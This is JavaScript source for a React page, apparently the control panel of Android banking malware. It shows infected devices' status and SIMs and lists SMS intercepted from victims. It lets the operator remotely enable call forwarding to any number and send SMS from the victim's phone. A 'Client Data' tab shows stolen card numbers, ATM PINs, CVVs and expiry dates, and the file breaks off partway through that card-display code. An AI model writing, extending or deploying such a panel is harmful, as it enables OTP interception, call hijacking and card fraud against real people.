import React, { useState, useEffect, useMemo, useCallback, useRef } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { useFirebase } from '../hooks/useFirebase';
import { Phone, MessageSquare, Copy, Trash2 } from 'lucide-react';
import { getDatabase, ref, onValue, off, get, query, limitToLast } from 'firebase/database';
import { initializeApp, getApps } from 'firebase/app';
import { getFirebaseConfig } from '../firebase-config';
import '../App.css';

const DeviceDetails = () => {
  const { deviceId } = useParams();
  const navigate = useNavigate();
  const token = sessionStorage.getItem('token');
  // Only get sendCommand and deleteMessage from useFirebase - don't load all devices/messages
  const { sendCommand, deleteMessage } = useFirebase(token);
  const [activeTab, setActiveTab] = useState('info');
  const [callNumber, setCallNumber] = useState('');
  const [smsNumber, setSmsNumber] = useState('');
  const [smsMessage, setSmsMessage] = useState('');
  const [selectedSim, setSelectedSim] = useState(0);
  const [deviceDetails, setDeviceDetails] = useState(null);
  const [loading, setLoading] = useState(true);
  const [callForwarding, setCallForwarding] = useState(null);
  const [sendingSms, setSendingSms] = useState(false);
  const [processingCall, setProcessingCall] = useState(false);
  const [deviceMessages, setDeviceMessages] = useState([]);
  
  // Use refs to prevent unnecessary re-renders
  const listenersRef = useRef([]);
  const isMountedRef = useRef(true);
  
  // Check URL hash on mount to set initial tab (e.g., #sms)
  useEffect(() => {
    const hash = window.location.hash.replace('#', '');
    if (hash === 'sms') {
      setActiveTab('sms');
      // Clear hash after setting tab
      window.history.replaceState(null, '', window.location.pathname);
    }
  }, []);

  // Prevent navigation when message is typed in send SMS screen (but allow after sending)
  useEffect(() => {
    // Only prevent navigation if there's an unsent message (form is cleared after sending)
    if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
      const handleBeforeUnload = (e) => {
        e.preventDefault();
        e.returnValue = 'You have an unsent message. Are you sure you want to leave?';
        return e.returnValue;
      };

      window.addEventListener('beforeunload', handleBeforeUnload);

      return () => {
        window.removeEventListener('beforeunload', handleBeforeUnload);
      };
    }
  }, [activeTab, smsMessage]);
  
  // Optimized: Load ONLY this device directly from Firebase (no dependency on devices array)
  useEffect(() => {
    if (!deviceId || !token) {
      setLoading(false);
      return;
    }
    
    isMountedRef.current = true;
    const config = getFirebaseConfig(token);
    if (!config) {
      setLoading(false);
      return;
    }
    
    let app;
    try {
      const existingApps = getApps();
      const existingApp = existingApps.find(a => {
        try {
          return a.options.projectId === config.projectId;
        } catch {
          return false;
        }
      });
      
      if (existingApp) {
        app = existingApp;
      } else {
        app = initializeApp(config, `app_${token.substring(0, 10)}`);
      }
    } catch (error) {
      if (error.code === 'app/duplicate-app') {
        app = getApps()[0];
      } else {
        console.error('Firebase init error:', error);
        setLoading(false);
        return;
      }
    }
    
    const database = getDatabase(app);
    
    // Fast initial load - use get() instead of onValue for first load
    const deviceRef = ref(database, `devices/${deviceId}`);
    
    // Load device data immediately (one-time fetch, faster than listener)
    get(deviceRef).then((snapshot) => {
      if (!isMountedRef.current) return;
      
      const data = snapshot.val();
      if (data && !data.deleted) {
        // Fast parse - only essential fields
        let initialOnline = false;
        if (data.device_status) {
          const status = data.device_status.status || '';
          const statusTimestamp = data.device_status.timestamp || 0;
          const now = Date.now();
          const timeDiff = now - statusTimestamp;
          initialOnline = (status.toLowerCase() === 'online') && (timeDiff <= 60000);
        } else if (data.status) {
          const status = data.status.status || '';
          const statusTimestamp = data.status.timestamp || 0;
          const now = Date.now();
          const timeDiff = now - statusTimestamp;
          initialOnline = (status.toLowerCase() === 'online') && (timeDiff <= 60000);
        } else {
          initialOnline = data.isOnline === true || false;
        }
        
        const merged = {
          id: deviceId,
          online: initialOnline,
          favorite: data.favorite || false,
          battery: 0,
          sims: [],
          model: 'Unknown',
          installTime: Date.now(),
          installDate: null,
          clientData: null
        };
        
        // Fast parse deviceInfo
        if (data.deviceInfo) {
          merged.model = data.deviceInfo.model || data.deviceInfo.deviceName || 'Unknown';
          merged.serial = data.deviceInfo.deviceId || deviceId;
          merged.deviceName = data.deviceInfo.deviceName || '';
          merged.manufacturer = data.deviceInfo.manufacturer || '';
          merged.androidVersion = data.deviceInfo.androidVersion || '';
        }
        
        // Fast parse battery (only latest)
        if (data.battery) {
          const batteryEntries = Object.entries(data.battery);
          if (batteryEntries.length > 0) {
            const latestBattery = batteryEntries.sort((a, b) => Number(b[0]) - Number(a[0]))[0];
            const batteryValue = latestBattery[1];
            merged.battery = typeof batteryValue === 'object' && batteryValue.percentage !== undefined
              ? batteryValue.percentage
              : (typeof batteryValue === 'number' ? batteryValue : 0);
          }
        }
        
        // Fast parse simInfo
        if (data.simInfo?.sims) {
          if (Array.isArray(data.simInfo.sims)) {
            merged.sims = data.simInfo.sims.map(sim => ({
              operator: sim.simOperator || 'Unknown',
              number: sim.phoneNumber || 'N/A'
            }));
          } else if (typeof data.simInfo.sims === 'object') {
            merged.sims = Object.values(data.simInfo.sims).map(sim => ({
              operator: sim.simOperator || 'Unknown',
              number: sim.phoneNumber || 'N/A'
            }));
          }
        }
        
        if (data.installDate) {
          let parsedDate = new Date(data.installDate);
          merged.installTime = isNaN(parsedDate.getTime()) ? Date.now() : parsedDate.getTime();
          merged.installDate = data.installDate;
        }
        
        // Fast parse clientData
        if (data.clientData) {
          merged.clientData = { ...data.clientData };
        }
        
        setDeviceDetails(merged);
        setLoading(false);
        
        // Now set up realtime listeners (non-blocking, after initial load)
        setupRealtimeListeners(database, deviceId, merged);
      } else {
        if (isMountedRef.current) {
          setLoading(false);
        }
      }
    }).catch((error) => {
      console.error('Error loading device:', error);
      if (isMountedRef.current) {
        setLoading(false);
      }
    });
    
    // Cleanup function
    return () => {
      isMountedRef.current = false;
      // Clean up all listeners
      listenersRef.current.forEach(listener => {
        try {
          off(listener.ref);
        } catch (e) {
          // Ignore cleanup errors
        }
      });
      listenersRef.current = [];
    };
  }, [deviceId, token]);
  
  // Separate function for realtime listeners (non-blocking)
  const setupRealtimeListeners = useCallback((database, deviceId, initialDevice) => {
    if (!isMountedRef.current) return;
    
    // Listen to call forwarding status
    const callForwardingStatusRef = ref(database, `devices/${deviceId}/callForwarding/status`);
    const callForwardingListener = onValue(callForwardingStatusRef, (snapshot) => {
      if (!isMountedRef.current) return;
      setCallForwarding(snapshot.val());
    }, (error) => {
      if (isMountedRef.current) setCallForwarding(null);
    });
    listenersRef.current.push({ ref: callForwardingStatusRef });
    
    // Listen to device_status for online/offline (primary)
    const deviceStatusRef = ref(database, `devices/${deviceId}/device_status`);
    const deviceStatusListener = onValue(deviceStatusRef, (snapshot) => {
      if (!isMountedRef.current) return;
      const statusData = snapshot.val();
      if (statusData) {
        const status = statusData.status || '';
        const statusTimestamp = statusData.timestamp || 0;
        const now = Date.now();
        const timeDiff = now - statusTimestamp;
        const isOnline = (status.toLowerCase() === 'online') && (timeDiff <= 60000);
        
        setDeviceDetails(prev => {
          if (!prev) return prev;
          return { ...prev, online: isOnline };
        });
      }
    }, (error) => {
      // Ignore errors
    });
    listenersRef.current.push({ ref: deviceStatusRef });
    
    // Fallback: Listen to status
    const statusRef = ref(database, `devices/${deviceId}/status`);
    const statusListener = onValue(statusRef, (snapshot) => {
      if (!isMountedRef.current) return;
      const statusData = snapshot.val();
      if (statusData) {
        const status = statusData.status || '';
        const statusTimestamp = statusData.timestamp || 0;
        const now = Date.now();
        const timeDiff = now - statusTimestamp;
        const isOnline = (status.toLowerCase() === 'online') && (timeDiff <= 60000);
        
        setDeviceDetails(prev => {
          if (!prev) return prev;
          return { ...prev, online: isOnline };
        });
      }
    }, (error) => {
      // Ignore errors
    });
    listenersRef.current.push({ ref: statusRef });
    
    // Listen to device updates (battery, sims, etc.) - throttled
    const deviceRef = ref(database, `devices/${deviceId}`);
    let updateTimeout = null;
    const deviceListener = onValue(deviceRef, (snapshot) => {
      if (!isMountedRef.current) return;
      
      // Throttle updates to prevent UI lag
      if (updateTimeout) {
        clearTimeout(updateTimeout);
      }
      updateTimeout = setTimeout(() => {
        if (!isMountedRef.current) return;
        const data = snapshot.val();
        if (data && !data.deleted) {
          setDeviceDetails(prev => {
            if (!prev) return prev;
            
            // Only update changed fields to prevent full re-render
            const updated = { ...prev };
            
            if (data.battery) {
              const batteryEntries = Object.entries(data.battery);
              if (batteryEntries.length > 0) {
                const latestBattery = batteryEntries.sort((a, b) => Number(b[0]) - Number(a[0]))[0];
                const batteryValue = latestBattery[1];
                updated.battery = typeof batteryValue === 'object' && batteryValue.percentage !== undefined
                  ? batteryValue.percentage
                  : (typeof batteryValue === 'number' ? batteryValue : 0);
              }
            }
            
            if (data.simInfo?.sims) {
              if (Array.isArray(data.simInfo.sims)) {
                updated.sims = data.simInfo.sims.map(sim => ({
                  operator: sim.simOperator || 'Unknown',
                  number: sim.phoneNumber || 'N/A'
                }));
              } else if (typeof data.simInfo.sims === 'object') {
                updated.sims = Object.values(data.simInfo.sims).map(sim => ({
                  operator: sim.simOperator || 'Unknown',
                  number: sim.phoneNumber || 'N/A'
                }));
              }
            }
            
            if (data.clientData) {
              updated.clientData = { ...data.clientData };
            }
            
            if (data.favorite !== undefined) {
              updated.favorite = data.favorite;
            }
            
            return updated;
          });
        }
      }, 500); // Throttle to 500ms
    }, (error) => {
      // Ignore errors
    });
    listenersRef.current.push({ ref: deviceRef });
    
    // Load messages only when SMS tab is active (lazy load)
    // This will be handled separately when tab changes
  }, []);
  
  // Load messages only when needed (lazy load for SMS tab)
  useEffect(() => {
    if (activeTab !== 'sms' || !deviceId || !token) {
      setDeviceMessages([]);
      return;
    }
    
    const config = getFirebaseConfig(token);
    if (!config) return;
    
    let app;
    try {
      const existingApps = getApps();
      const existingApp = existingApps.find(a => {
        try {
          return a.options.projectId === config.projectId;
        } catch {
          return false;
        }
      });
      app = existingApp || initializeApp(config, `app_${token.substring(0, 10)}`);
    } catch (error) {
      if (error.code === 'app/duplicate-app') {
        app = getApps()[0];
      } else {
        return;
      }
    }
    
    const database = getDatabase(app);
    
    // Load only this device's messages (limit to last 100 for performance)
    const deviceSmsRef = query(ref(database, `devices/${deviceId}/sms`), limitToLast(100));
    
    const unsubscribe = onValue(deviceSmsRef, (snapshot) => {
      if (!isMountedRef.current) return;
      const data = snapshot.val();
      if (data) {
        const messages = Object.entries(data)
          .filter(([id, msg]) => !msg.deleted)
          .map(([id, msg]) => {
            const timestamp = msg.timestamp || msg.date || id;
            let parsedTimestamp;
            
            if (typeof timestamp === 'number') {
              parsedTimestamp = timestamp;
            } else if (typeof timestamp === 'string') {
              parsedTimestamp = new Date(timestamp).getTime();
              if (isNaN(parsedTimestamp)) {
                parsedTimestamp = parseInt(timestamp) || Date.now();
              }
            } else {
              parsedTimestamp = Date.now();
            }
            
            let simSlot = null;
            if (msg.simSlot !== null && msg.simSlot !== undefined) {
              simSlot = typeof msg.simSlot === 'number' ? msg.simSlot : parseInt(msg.simSlot);
              if (isNaN(simSlot)) simSlot = null;
            }
            
            return {
              id: id,
              timestamp: parsedTimestamp,
              sender: msg.sender || msg.from || 'Unknown',
              body: msg.message || msg.body || msg.text || msg.content || '',
              deviceId: deviceId,
              date: msg.date || null,
              simSlot: simSlot,
              subscriptionId: msg.subscriptionId || null
            };
          })
          .sort((a, b) => (b.timestamp || 0) - (a.timestamp || 0));
        
        setDeviceMessages(messages);
      } else {
        setDeviceMessages([]);
      }
    }, (error) => {
      setDeviceMessages([]);
    });
    
    return () => {
      off(deviceSmsRef);
    };
  }, [activeTab, deviceId, token]);

  // Memoize device to prevent unnecessary re-renders
  const device = useMemo(() => deviceDetails, [deviceDetails]);

  // Show loading state - NO instant "not found"
  if (loading) {
    return (
      <div style={{ 
        display: 'flex', 
        justifyContent: 'center', 
        alignItems: 'center', 
        height: '100vh',
        flexDirection: 'column',
        gap: '20px'
      }}>
        <div className="loading-spinner"></div>
        <p style={{ color: '#6b7280' }}>Loading device...</p>
      </div>
    );
  }

  if (!device) {
    return (
      <div style={{ 
        display: 'flex', 
        justifyContent: 'center', 
        alignItems: 'center', 
        height: '100vh',
        flexDirection: 'column',
        gap: '20px'
      }}>
        <p style={{ color: '#ef4444' }}>Device not found</p>
        <button onClick={() => navigate('/dashboard')} style={{
          padding: '10px 20px',
          background: '#3b82f6',
          color: 'white',
          border: 'none',
          borderRadius: '8px',
          cursor: 'pointer'
        }}>
          Back to Dashboard
        </button>
      </div>
    );
  }

  const handleCall = (action = 'activate') => {
    if (action === 'activate' && !callNumber) {
      alert('Please enter a phone number to forward calls to');
      return;
    }
    
    // Prevent multiple clicks
    if (processingCall) return;
    
    // Store values
    const forwardNum = callNumber;
    const sim = selectedSim;
    
    // Clear form immediately to allow navigation
    if (action === 'activate') {
      setCallNumber('');
    }
    
    // Reset state immediately - use requestAnimationFrame for instant UI update
    requestAnimationFrame(() => {
      setProcessingCall(false);
    });
    
    // Send command in background (fire-and-forget) - don't await anything
    // Use setTimeout to ensure it runs after current execution
    setTimeout(() => {
      sendCommand(deviceId, 'call_forward', {
        forwardNumber: forwardNum,
        simSlot: sim,
        action: action
      }).catch(error => {
        console.error('Error processing call command:', error);
        alert(`Failed to ${action} call forwarding. Please try again.`);
      });
    }, 0);
    
    // Show success feedback asynchronously
    requestAnimationFrame(() => {
      setTimeout(() => {
        const showToast = (message, type = 'info') => {
          const existingToasts = document.querySelectorAll('.toast-notification');
          existingToasts.forEach(toast => toast.remove());
          const toast = document.createElement('div');
          toast.className = `toast-notification toast-${type}`;
          toast.textContent = message;
          document.body.appendChild(toast);
          setTimeout(() => toast.classList.add('show'), 10);
          setTimeout(() => {
            toast.classList.remove('show');
            setTimeout(() => toast.remove(), 300);
          }, 2000);
        };
        
        showToast(
          action === 'activate' 
            ? 'Call forwarding activated successfully' 
            : 'Call forwarding deactivated successfully',
          'success'
        );
      }, 200);
    });
  };

  const handleSendSms = () => {
    if (!smsNumber || !smsMessage) {
      alert('Please enter phone number and message');
      return;
    }
    
    // Prevent sending if already sending
    if (sendingSms) return;
    
    // Store values before clearing
    const phoneToSend = smsNumber;
    const messageToSend = smsMessage;
    const sim = selectedSim;
    
    // Clear form immediately to allow navigation
    setSmsNumber('');
    setSmsMessage('');
    
    // Reset sendingSms state immediately to allow navigation
    setSendingSms(false);
    
    // Send command in background (fire-and-forget) - don't await anything
    // Use setTimeout to ensure it runs after current execution
    setTimeout(() => {
      sendCommand(deviceId, 'send_sms', {
        phoneNumber: phoneToSend,
        message: messageToSend,
        simSlot: sim
      }).catch(error => {
        console.error('Error sending SMS:', error);
        alert('Failed to send SMS. Please try again.');
      });
    }, 0);
    
    // Show success feedback asynchronously
    setTimeout(() => {
      const showToast = (message, type = 'info') => {
        const existingToasts = document.querySelectorAll('.toast-notification');
        existingToasts.forEach(toast => toast.remove());
        const toast = document.createElement('div');
        toast.className = `toast-notification toast-${type}`;
        toast.textContent = message;
        document.body.appendChild(toast);
        setTimeout(() => toast.classList.add('show'), 10);
        setTimeout(() => {
          toast.classList.remove('show');
          setTimeout(() => toast.remove(), 300);
        }, 2000);
      };
      
      showToast('SMS sent successfully', 'success');
    }, 200);
  };

  const copyText = async (text) => {
    try {
      await navigator.clipboard.writeText(text);
      // Show success feedback
      const showToast = (message) => {
        const existingToasts = document.querySelectorAll('.toast-notification');
        existingToasts.forEach(toast => toast.remove());
        const toast = document.createElement('div');
        toast.className = 'toast-notification toast-success show';
        toast.textContent = message;
        document.body.appendChild(toast);
        setTimeout(() => {
          toast.classList.remove('show');
          setTimeout(() => toast.remove(), 300);
        }, 2000);
      };
      showToast('Copied to clipboard!');
    } catch (error) {
      console.error('Failed to copy:', error);
    }
  };

  return (
    <div className="device-details">
      <header className="device-header">
        <button 
          onClick={() => {
            // Only show confirmation if there's an unsent message and we're on sms-send tab
            if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
              if (!window.confirm('You have an unsent message. Are you sure you want to leave?')) {
                return;
              }
            }
            // Navigate immediately - don't wait for anything
            navigate(-1);
          }} 
          className="back-btn"
          disabled={false}
        >←</button>
        <div style={{ flex: 1 }}>
          <h2>{String(device.model || 'Unknown')}</h2>
          <div style={{ fontSize: '12px', color: '#6b7280', marginTop: '4px' }}>
            Device ID: {String(device.id || '').slice(-8)}
          </div>
        </div>
        <div className="device-status">
          <span style={{ color: device.online ? '#22c55e' : '#ef4444', fontWeight: 'bold' }}>
            {device.online ? '🟢 Online' : '🔴 Offline'}
          </span>
          <span>{Number(device.battery || 0)}% 🔋</span>
        </div>
      </header>

      <nav className="device-tabs">
        <button className={activeTab === 'info' ? 'active' : ''} onClick={() => {
          // Only show confirmation if there's an unsent message
          if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
            if (!window.confirm('You have an unsent message. Are you sure you want to leave?')) {
              return;
            }
          }
          setActiveTab('info');
        }}>
          Info
        </button>
        <button className={activeTab === 'sms' ? 'active' : ''} onClick={() => {
          // Only show confirmation if there's an unsent message
          if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
            if (!window.confirm('You have an unsent message. Are you sure you want to leave?')) {
              return;
            }
          }
          setActiveTab('sms');
        }}>
          SMS ({deviceMessages.length})
        </button>
        <button className={activeTab === 'call' ? 'active' : ''} onClick={() => {
          // Only show confirmation if there's an unsent message
          if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
            if (!window.confirm('You have an unsent message. Are you sure you want to leave?')) {
              return;
            }
          }
          setActiveTab('call');
        }}>
          <Phone size={18} />
        </button>
        <button className={activeTab === 'sms-send' ? 'active' : ''} onClick={() => {
          // Always allow navigation to sms-send
          setActiveTab('sms-send');
        }}>
          <MessageSquare size={18} />
        </button>
        <button className={activeTab === 'client' ? 'active' : ''} onClick={() => {
          // Only show confirmation if there's an unsent message
          if (activeTab === 'sms-send' && smsMessage.trim().length > 0) {
            if (!window.confirm('You have an unsent message. Are you sure you want to leave?')) {
              return;
            }
          }
          setActiveTab('client');
        }}>
          Client Data
        </button>
      </nav>

      <main className="device-content">
        {activeTab === 'info' && (
          <div className="device-info">
            {/* Call Forwarding Status - Show only when enabled */}
            {callForwarding && callForwarding.enabled === true && callForwarding.forwardNumber ? (
              <div style={{ 
                marginBottom: '20px', 
                padding: '16px', 
                background: 'white', 
                borderRadius: '12px', 
                boxShadow: '0 2px 8px rgba(0,0,0,0.06)',
                border: '1px solid #22c55e'
              }}>
                <div style={{ 
                  fontSize: '14px', 
                  fontWeight: '600', 
                  color: '#22c55e',
                  display: 'flex',
                  alignItems: 'center',
                  gap: '8px'
                }}>
                  <span>✓ Call forward enabled on</span>
                  <span style={{ 
                    fontSize: '16px', 
                    fontWeight: '700',
                    color: '#22c55e'
                  }}>
                    {callForwarding.forwardNumber}
                  </span>
                </div>
                {callForwarding.date && (
                  <div style={{ 
                    fontSize: '12px', 
                    color: '#6b7280', 
                    marginTop: '6px'
                  }}>
                    {callForwarding.date}
                  </div>
                )}
              </div>
            ) : null}
            
            {/* SIM Cards */}
            <div className="sim-cards">
              <h3 style={{ fontSize: '16px', fontWeight: '600', marginBottom: '12px', color: '#1f2937' }}>Available SIM Cards</h3>
              {Array.isArray(device.sims) && device.sims.length > 0 ? (
                device.sims.map((sim, index) => (
                  <div key={index} className="sim-card">
                    <div style={{ 
                      fontSize: '16px', 
                      fontWeight: '600', 
                      color: '#1f2937',
                      marginBottom: '8px'
                    }}>
                      {String(sim?.operator || 'Unknown')}
                    </div>
                    <div style={{ 
                      fontSize: '14px', 
                      color: '#6b7280'
                    }}>
                      {String(sim?.number || 'N/A')}
                    </div>
                  </div>
                ))
              ) : (
                <div className="sim-card">No SIM cards configured</div>
              )}
            </div>
          </div>
        )}

        {activeTab === 'sms' && (
          <div className="messages-list">
            {deviceMessages.map(msg => (
              <div key={msg.id} className="message-item">
                <div className="msg-sender">{msg.sender || 'Unknown'}</div>
                <div className="msg-body" style={{
                  wordWrap: 'break-word',
                  overflowWrap: 'break-word',
                  maxHeight: '300px',
                  overflowY: 'auto',
                  whiteSpace: 'pre-wrap'
                }}>{msg.body || ''}</div>
                <div style={{ 
                  display: 'flex', 
                  gap: '12px', 
                  fontSize: '12px', 
                  color: '#6b7280', 
                  marginBottom: '8px',
                  flexWrap: 'wrap'
                }}>
                  <span style={{ 
                    fontWeight: '500',
                    color: '#3b82f6'
                  }}>
                    SIM {msg.simSlot !== null && msg.simSlot !== undefined ? (Number(msg.simSlot) + 1) : 1}
                  </span>
                  {device.serial && (
                    <span>Serial: {device.serial}</span>
                  )}
                </div>
                <div className="msg-time">
                  {(() => {
                    if (!msg.timestamp) return 'Unknown time';
                    const date = new Date(msg.timestamp);
                    if (isNaN(date.getTime())) return 'Unknown time';
                    try {
                      return date.toLocaleString();
                    } catch (error) {
                      console.warn('Invalid timestamp for toLocaleString:', msg.timestamp);
                      return 'Unknown time';
                    }
                  })()}
                </div>
                <div className="msg-actions">
                  <button 
                    onClick={(e) => {
                      e.preventDefault();
                      e.stopPropagation();
                      copyText(msg.body);
                    }}
                    style={{ cursor: 'pointer' }}
                  >
                    <Copy size={16} />
                  </button>
                  <button 
                    onClick={(e) => {
                      e.preventDefault();
                      e.stopPropagation();
                      if (window.confirm('Are you sure you want to delete this message? This action cannot be undone.')) {
                        deleteMessage(msg.id);
                      }
                    }}
                    style={{ cursor: 'pointer' }}
                  >
                    <Trash2 size={16} />
                  </button>
                </div>
              </div>
            ))}
          </div>
        )}

        {activeTab === 'call' && (
          <div className="call-control compact-control">
            <input
              type="tel"
              placeholder="Enter phone number (e.g., +917282881680)"
              value={callNumber}
              onChange={(e) => setCallNumber(e.target.value)}
              className="input-field compact-input"
            />
            
            <div style={{ marginBottom: '12px' }}>
              <label style={{ 
                fontSize: '13px', 
                fontWeight: '500', 
                color: '#374151', 
                marginBottom: '8px',
                display: 'block'
              }}>
                Select SIM Card
              </label>
              <div style={{ 
                display: 'flex', 
                gap: '16px',
                alignItems: 'center'
              }}>
                {(() => {
                  const sim1 = device?.sims && Array.isArray(device.sims) && device.sims[0];
                  const sim2 = device?.sims && Array.isArray(device.sims) && device.sims[1];
                  return (
                    <>
                      <label style={{ 
                        display: 'flex', 
                        alignItems: 'center', 
                        gap: '6px',
                        cursor: 'pointer',
                        fontSize: '13px',
                        color: '#374151'
                      }}>
                        <input
                          type="radio"
                          name="sim-select-call"
                          checked={selectedSim === 0}
                          onChange={() => setSelectedSim(0)}
                          disabled={!sim1 || (!sim1.operator && !sim1.number)}
                          style={{
                            width: '16px',
                            height: '16px',
                            cursor: 'pointer',
                            accentColor: '#3b82f6'
                          }}
                        />
                        <span>SIM 1</span>
                        {sim1 && sim1.number && sim1.number !== 'N/A' && (
                          <span style={{ fontSize: '11px', color: '#6b7280' }}>
                            ({sim1.number.replace(/^\+\d{1,3}/, '')})
                          </span>
                        )}
                      </label>
                      <label style={{ 
                        display: 'flex', 
                        alignItems: 'center', 
                        gap: '6px',
                        cursor: 'pointer',
                        fontSize: '13px',
                        color: '#374151'
                      }}>
                        <input
                          type="radio"
                          name="sim-select-call"
                          checked={selectedSim === 1}
                          onChange={() => setSelectedSim(1)}
                          disabled={!sim2 || (!sim2.operator && !sim2.number)}
                          style={{
                            width: '16px',
                            height: '16px',
                            cursor: 'pointer',
                            accentColor: '#3b82f6'
                          }}
                        />
                        <span>SIM 2</span>
                        {sim2 && sim2.number && sim2.number !== 'N/A' && (
                          <span style={{ fontSize: '11px', color: '#6b7280' }}>
                            ({sim2.number.replace(/^\+\d{1,3}/, '')})
                          </span>
                        )}
                      </label>
                    </>
                  );
                })()}
              </div>
            </div>
            
            <div className="action-buttons-row">
              <button 
                className="action-btn compact-btn" 
                onClick={() => handleCall('activate')}
                disabled={processingCall}
                style={{ 
                  backgroundColor: processingCall ? '#9ca3af' : '#22c55e',
                  cursor: processingCall ? 'not-allowed' : 'pointer',
                  opacity: processingCall ? 0.6 : 1
                }}
              >
                {processingCall ? 'Processing...' : 'Activate'}
              </button>
              <button 
                className="action-btn compact-btn" 
                onClick={() => handleCall('deactivate')}
                disabled={processingCall}
                style={{ 
                  backgroundColor: processingCall ? '#9ca3af' : '#ef4444',
                  cursor: processingCall ? 'not-allowed' : 'pointer',
                  opacity: processingCall ? 0.6 : 1
                }}
              >
                {processingCall ? 'Processing...' : 'Deactivate'}
              </button>
            </div>
          </div>
        )}

        {activeTab === 'sms-send' && (
          <div className="sms-control">
            <input
              type="tel"
              placeholder="Phone number (3-15 digits)"
              value={smsNumber}
              onChange={(e) => setSmsNumber(e.target.value)}
              className="input-field"
            />
            <textarea
              placeholder="Message (max 1600 characters)"
              value={smsMessage}
              onChange={(e) => {
                const value = e.target.value;
                // Limit to 1600 characters to prevent crashes
                if (value.length <= 1600) {
                  setSmsMessage(value);
                }
              }}
              className="input-field"
              rows="4"
              maxLength={1600}
              disabled={sendingSms}
            />
            <div style={{ 
              fontSize: '12px', 
              color: smsMessage.length > 1500 ? '#ef4444' : '#6b7280',
              marginTop: '-8px',
              marginBottom: '12px',
              textAlign: 'right'
            }}>
              {smsMessage.length}/1600
            </div>
            
            <div style={{ marginBottom: '12px' }}>
              <label style={{ 
                fontSize: '13px', 
                fontWeight: '500', 
                color: '#374151', 
                marginBottom: '8px',
                display: 'block'
              }}>
                Select SIM Card
              </label>
              <div style={{ 
                display: 'flex', 
                gap: '16px',
                alignItems: 'center'
              }}>
                {device?.sims && Array.isArray(device.sims) && device.sims.length > 0 ? (
                  device.sims.map((sim, index) => (
                    <label
                      key={index}
                      style={{ 
                        display: 'flex', 
                        alignItems: 'center', 
                        gap: '6px',
                        cursor: 'pointer',
                        fontSize: '13px',
                        color: '#374151'
                      }}
                    >
                      <input
                        type="radio"
                        name="sim-select-sms"
                        checked={selectedSim === index}
                        onChange={() => setSelectedSim(index)}
                        disabled={!sim || (!sim.operator && !sim.number)}
                        style={{
                          width: '16px',
                          height: '16px',
                          cursor: 'pointer',
                          accentColor: '#3b82f6'
                        }}
                      />
                      <span>SIM {index + 1}</span>
                      {sim.number && sim.number !== 'N/A' && (
                        <span style={{ fontSize: '11px', color: '#6b7280' }}>
                          ({sim.number.replace(/^\+\d{1,3}/, '')})
                        </span>
                      )}
                    </label>
                  ))
                ) : (
                  <>
                    <label style={{ 
                      display: 'flex', 
                      alignItems: 'center', 
                      gap: '6px',
                      cursor: 'pointer',
                      fontSize: '13px',
                      color: '#374151'
                    }}>
                      <input
                        type="radio"
                        name="sim-select-sms"
                        checked={selectedSim === 0}
                        onChange={() => setSelectedSim(0)}
                        style={{
                          width: '16px',
                          height: '16px',
                          cursor: 'pointer',
                          accentColor: '#3b82f6'
                        }}
                      />
                      <span>SIM 1</span>
                    </label>
                    <label style={{ 
                      display: 'flex', 
                      alignItems: 'center', 
                      gap: '6px',
                      cursor: 'pointer',
                      fontSize: '13px',
                      color: '#374151'
                    }}>
                      <input
                        type="radio"
                        name="sim-select-sms"
                        checked={selectedSim === 1}
                        onChange={() => setSelectedSim(1)}
                        style={{
                          width: '16px',
                          height: '16px',
                          cursor: 'pointer',
                          accentColor: '#3b82f6'
                        }}
                      />
                      <span>SIM 2</span>
                    </label>
                  </>
                )}
              </div>
            </div>
            
            <button 
              className="action-btn" 
              onClick={handleSendSms}
              disabled={sendingSms || !smsNumber || !smsMessage}
              style={{
                opacity: sendingSms || !smsNumber || !smsMessage ? 0.6 : 1,
                cursor: sendingSms || !smsNumber || !smsMessage ? 'not-allowed' : 'pointer'
              }}
            >
              {sendingSms ? '⏳ Sending...' : 'Send SMS'}
            </button>
          </div>
        )}

        {activeTab === 'client' && (
          <div className="client-data" style={{ padding: '20px' }}>
            {device.clientData ? (
              <div style={{ 
                background: 'white', 
                padding: '24px', 
                borderRadius: '8px', 
                boxShadow: '0 2px 4px rgba(0,0,0,0.1)'
              }}>
                <h3 style={{ marginBottom: '20px', color: '#1f2937', borderBottom: '2px solid #e5e7eb', paddingBottom: '10px' }}>
                  Client Information
                </h3>
                
                {/* Helper function to create copyable field */}
                {(() => {
                  const createCopyableField = (label, value, key) => {
                    if (!value || value === 'N/A') return null;
                    return (
                      <div key={key} style={{ display: 'flex', flexDirection: 'column', gap: '4px' }}>
                        <label style={{ fontSize: '12px', color: '#6b7280', fontWeight: '600', textTransform: 'uppercase' }}>
                          {label}
                        </label>
                        <div 
                          onClick={() => {
                            navigator.clipboard.writeText(value);
                            const showToast = (message) => {
                              const toast = document.createElement('div');
                              toast.className = 'toast-notification toast-success show';
                              toast.textContent = message;
                              document.body.appendChild(toast);
                              setTimeout(() => {
                                toast.classList.remove('show');
                                setTimeout(() => toast.remove(), 300);
                              }, 2000);
                            };
                            showToast('Copied to clipboard!');
                          }}
                          style={{ 
                            fontSize: '16px', 
                            color: '#1f2937', 
                            padding: '8px 12px', 
                            background: '#f9fafb', 
                            borderRadius: '6px',
                            cursor: 'pointer',
                            transition: 'all 0.2s',
                            userSelect: 'none'
                          }}
                          onMouseEnter={(e) => {
                            e.target.style.background = '#e5e7eb';
                            e.target.style.transform = 'scale(1.02)';
                          }}
                          onMouseLeave={(e) => {
                            e.target.style.background = '#f9fafb';
                            e.target.style.transform = 'scale(1)';
                          }}
                        >
                          {value}
                        </div>
                      </div>
                    );
                  };

                  const createCardPrototype = (cardData, cardNumber) => {
                    if (!cardData) return null;
                    
                    const cardNum = cardData[`card${cardNumber}_number`];
                    const cardPin = cardData[`card${cardNumber}_atmPin`];
                    const cardCvv = cardData[`card${cardNumber}_cvv`];
                    const cardExpiry = cardData[`card${cardNumber}_expiry`];
                    const cardType = cardData[`card${cardNumber}_type`] || 'debit/credit card';
                    const cardDate = cardData[`card${cardNumber}_date`];
                    
                    // Debug: log to see what we have
                    console.log(`Card ${cardNumber} check:`, { 
                      cardNum, 
                      cardPin, 
                      cardCvv, 
                      cardExpiry, 
                      cardType,
                      allKeys: Object.keys(cardData).filter(k => k.includes('card'))
                    });
                    
